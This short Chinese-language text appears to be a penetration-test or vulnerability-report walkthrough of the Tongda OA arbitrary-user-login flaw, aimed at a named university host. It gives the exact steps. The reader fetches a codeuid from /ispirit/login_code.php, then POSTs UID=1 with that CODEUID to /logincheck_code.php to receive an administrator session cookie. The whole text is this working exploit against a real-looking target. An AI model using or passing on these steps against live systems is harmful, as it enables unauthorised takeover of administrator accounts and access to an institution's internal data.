1.访问默认管理员后台地址
弹出如下界面,猜测有通达OA任意用户登录漏洞
2.访问文件https://oaweb.hait.edu.cn//ispirit/login_code.php以获取codeuid。
**
3.访问文件/logincheck_code.php,同时抓包并修改请求包,将请求方式修改为POST方式,传递CODEUID和用户UID,返回的PHPSESSID即身份缓存。
改包内容:
·将请求方式修改为POST ·增加字段:Content-Type: application/x-www-form-urlencoded ·增加参数:UID=1&CODEUID=_PC{D0FD779B-1E0B-DABE-0CF2-2F7C34438498}&